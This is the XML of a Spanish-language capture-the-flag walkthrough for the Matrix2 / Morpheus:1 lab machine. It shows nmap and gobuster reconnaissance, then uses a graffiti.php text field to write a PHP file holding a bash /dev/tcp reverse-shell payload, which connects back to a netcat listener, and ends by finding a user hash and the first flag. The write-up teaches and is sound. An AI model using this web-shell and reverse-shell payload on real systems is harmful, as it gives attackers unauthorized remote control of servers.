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FA0406" w14:textId="77777777" w:rsidR="004607D3" w:rsidRPr="003F46EB" w:rsidRDefault="007B3507" w:rsidP="003F46EB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F46EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Matrix2 – Morpheus:1 || Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167949E7" w14:textId="77777777" w:rsidR="007B3507" w:rsidRDefault="007B3507">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Lo primero que haremos será reconocer la IP de la máquina correspondiente a “Matrix2”. Para esto procedemos a utilizar el comando arp-scan, que nos permitirá escanear las IPs asociadas al target que ingresemos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4614CFBA" w14:textId="0FF98756" w:rsidR="007B3507" w:rsidRPr="00F00DA7" w:rsidRDefault="00F00DA7" w:rsidP="003857F7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72C99FD8" wp14:editId="1728495C">
            <wp:extent cx="3891982" cy="211201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96791" cy="2114620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2771DDE0" w14:textId="53E0AFD4" w:rsidR="007B3507" w:rsidRDefault="007B3507">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>La IP 154.254.100.</w:t>
      </w:r>
      <w:r w:rsidR="00F00DA7">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> correspondería a la maquina víctima.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5659A2E8" w14:textId="134F30CA" w:rsidR="003857F7" w:rsidRPr="00F00DA7" w:rsidRDefault="007B3507" w:rsidP="003857F7">
      <w:r>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Inmediatamente comenzamos un scan de puertos básico mediante nmap, a través del comando nmap -p- &lt;ip_target&gt;, con esto sabremos los puertos que tiene abiertos y ya para analizar más profundamente, según los puertos que encontremos abiertos, vamos a lanzar el comando sudo nmap -sSV -T5 -A -O -p&lt;open,po</w:t>
      </w:r>
      <w:r w:rsidR="003857F7">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>rts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>&gt; &lt;ip_targ</w:t>
      </w:r>
      <w:r w:rsidR="003857F7">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>et&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00F00DA7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="600F7898" wp14:editId="1FD19C1A">
            <wp:extent cx="5364480" cy="3199386"/>
            <wp:effectExtent l="0" t="0" r="762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68483" cy="3201773"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CB7187" w14:textId="77777777" w:rsidR="003857F7" w:rsidRDefault="003857F7" w:rsidP="003857F7">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Observamos todo tipo de información respecto a los puertos y sus servicios. Podríamos igualmente añadirle scripts de nmap pero eso queda a gusto del hacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CF1A50" w14:textId="77777777" w:rsidR="003857F7" w:rsidRDefault="003857F7" w:rsidP="003857F7">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sabiendo los servicios que ofrece cada puerto, nos enfocamos en el 80 y 81 que son servicios webs, asociados a una página.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3159D6" w14:textId="1B109DDF" w:rsidR="003857F7" w:rsidRDefault="003857F7" w:rsidP="003857F7">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Puerto 80</w:t>
      </w:r>
      <w:r w:rsidR="00E97845">
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06503A5E" w14:textId="3A865C02" w:rsidR="003857F7" w:rsidRDefault="00F00DA7" w:rsidP="003857F7">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F849A5C" wp14:editId="0D0185B0">
            <wp:extent cx="5612130" cy="305562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055620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDBD089" w14:textId="77777777" w:rsidR="003857F7" w:rsidRDefault="003857F7" w:rsidP="003857F7">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Podemos ver claramente el mensaje de inicio de la CTF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DBEDEF" w14:textId="162AA008" w:rsidR="003857F7" w:rsidRDefault="003857F7" w:rsidP="003857F7">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Revisamos el puerto 81 y encontramos una web donde requerimos inicio de sesión, por lo que por ahora la ignoraremos. De igual forma le echamos un vistazo al código fuente de la web y no encontramos nada, aparte de la imagen que la descargamos para a futuro realizarle un escaneo de metadato o estenográfico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EF3B03" w14:textId="7F0D96F2" w:rsidR="00265C77" w:rsidRDefault="004554FE" w:rsidP="003857F7">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Al no encontrar mayor información dentro de las páginas, decidimos realizar un escaneo de directorios mediante gobuster</w:t>
      </w:r>
      <w:r w:rsidR="007B3F2C">
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">de igual forma podemos utilizar herramientas de escaneo manuales u </w:t>
      </w:r>
      <w:r w:rsidR="007B3F2C">
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>otras automáticas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECB5267" w14:textId="0DE64BC6" w:rsidR="007B3F2C" w:rsidRDefault="00265C77" w:rsidP="007B3F2C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="444E5A68" wp14:editId="6EC2353E">
            <wp:extent cx="4749469" cy="251929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4999" cy="2548748"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAE3521" w14:textId="4B52B5F8" w:rsidR="007B3F2C" w:rsidRDefault="007B3F2C" w:rsidP="007B3F2C">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>En la imagen podemos observar que existe un directorio llamado graffiti.php e igualmente existe uno llamado graffiti.txt que no aparece en la imagen previa debido a que no agregue la extensión al momento de ejecutar el comando. El comando completo seria:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1BD92A" w14:textId="631D4F9B" w:rsidR="007B3F2C" w:rsidRPr="003F46EB" w:rsidRDefault="007B3F2C" w:rsidP="007B3F2C">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F46EB">
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>gobuster -u &lt;ip_target&gt; -w &lt;directorio_wordlist&gt; -x &lt;extensiones&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7683D2D5" w14:textId="5D89AAD6" w:rsidR="00E97845" w:rsidRPr="00E97845" w:rsidRDefault="00E97845" w:rsidP="007B3F2C">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E97845">
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Dentro del directorio /graffiti.p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>hp encontramos un ingreso de texto mediante el cual intentaremos ejecutar una reverse Shell con nuestra máquina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC5BD31" w14:textId="056BBEAB" w:rsidR="007B3F2C" w:rsidRDefault="00E97845" w:rsidP="00E97845">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="551249EE" wp14:editId="53DF8D91">
            <wp:extent cx="5612130" cy="2697480"/>
            <wp:effectExtent l="152400" t="152400" r="369570" b="3695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697480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:effectLst>
                      <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
                        <a:srgbClr val="333333">
                          <a:alpha val="65000"/>
                        </a:srgbClr>
                      </a:outerShdw>
                    </a:effectLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="117E6151" w14:textId="581EEB84" w:rsidR="00E97845" w:rsidRDefault="00E97845" w:rsidP="00E97845">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E97845">
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Esa conexión la haremos mediante e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>l comando a través de burpsuite</w:t>
      </w:r>
      <w:r w:rsidR="00D06FAE">
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>, pero previamente se debe tener abierta una conexión, en mi caso abri una conexión al puerto 12345 mediante netcat, para posteriormente ejecutar el comando</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DFE24F" w14:textId="184B3548" w:rsidR="00E97845" w:rsidRPr="00D06FAE" w:rsidRDefault="00E97845" w:rsidP="00E97845">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D06FAE">
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php exec(“/bin/bash -c ’bash -i&gt;&amp; /dev/tcp/&lt;ip_host&gt;/&lt;port&gt; 0&gt;&amp;1’”); ?&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00D06FAE" w:rsidRPr="00D06FAE">
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>y cambiando el file por shell.ph</w:t>
      </w:r>
      <w:r w:rsidR="00D06FAE">
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43012F17" w14:textId="3F8F607C" w:rsidR="0050458D" w:rsidRDefault="0050458D" w:rsidP="00D06FAE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D8B57E6" wp14:editId="01F8E21C">
            <wp:extent cx="4826150" cy="23717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1719" cy="2389205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A75466A" w14:textId="26EEBEF0" w:rsidR="00D06FAE" w:rsidRDefault="00D06FAE" w:rsidP="00E97845">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D06FAE">
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Una vez enviad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">o tendremos una respuesta de code 200, lo que significa que pasamos y ahora debemos abrir el archivo /shell.php para </w:t>
      </w:r>
      <w:r w:rsidR="0010147C">
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>activar la conexión, obteniendo algo así en nuestro listener de netcat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301FD1EA" w14:textId="5A2E4507" w:rsidR="0010147C" w:rsidRPr="00D06FAE" w:rsidRDefault="0010147C" w:rsidP="00E97845">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C1AFA4E" wp14:editId="425536B6">
            <wp:extent cx="5572125" cy="22955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713" b="47226"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5572125" cy="2295525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A72C466" w14:textId="58E2AAE0" w:rsidR="0010147C" w:rsidRDefault="0010147C" w:rsidP="00E97845">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Es hora de comenzar a indagar en los directorio, archivos y servicios que vayamos encontrando, de hecho si realizamos un ls -la encontraremos un archivo oculto llamado ‘.cypher-neo.png’, al cual accedemos mediante un navegador web y encontramos esta imagen, la cual descargamos a nuestra maquina mediante wget. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE96CF8" w14:textId="057D9B12" w:rsidR="003F46EB" w:rsidRDefault="0010147C" w:rsidP="00B20858">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AB37300" wp14:editId="5E18815D">
            <wp:extent cx="5097780" cy="430583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2693" cy="4309980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB2B5EA" w14:textId="19B91287" w:rsidR="00B20858" w:rsidRDefault="006F0EE6" w:rsidP="00B20858">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Luego de encontrar esta imagen y no tener mayor referencia, indagamos en el directorio de la imagen y encontramos el hash de la contraseña del usuario Cypher, pero no se logra descifrar mediante las herramientas clásicas como Jhon The Ripper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F43E610" w14:textId="0A3B7070" w:rsidR="006F0EE6" w:rsidRDefault="006F0EE6" w:rsidP="00B20858">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2555353B" wp14:editId="6BED489E">
            <wp:extent cx="5000000" cy="181904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sh cypher.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5000000" cy="1819048"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4845CF" w14:textId="3FED55AC" w:rsidR="006F0EE6" w:rsidRDefault="006F0EE6" w:rsidP="00B20858">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EFC7F14" wp14:editId="49890B64">
            <wp:extent cx="5612130" cy="358838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gnorance-bliss.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3588385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ED8EFE" w14:textId="4792D01F" w:rsidR="006F0EE6" w:rsidRDefault="006F0EE6" w:rsidP="00B20858">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>De igual forma se encuentra mediante el análisis de directorios la primera Flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66471B2A" w14:textId="3A7432AF" w:rsidR="006F0EE6" w:rsidRDefault="006F0EE6" w:rsidP="00B20858">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="nfasissutil"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16C947C2" wp14:editId="726FD5F4">
            <wp:extent cx="5022850" cy="1639047"/>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rst_flag.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5037895" cy="1643956"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
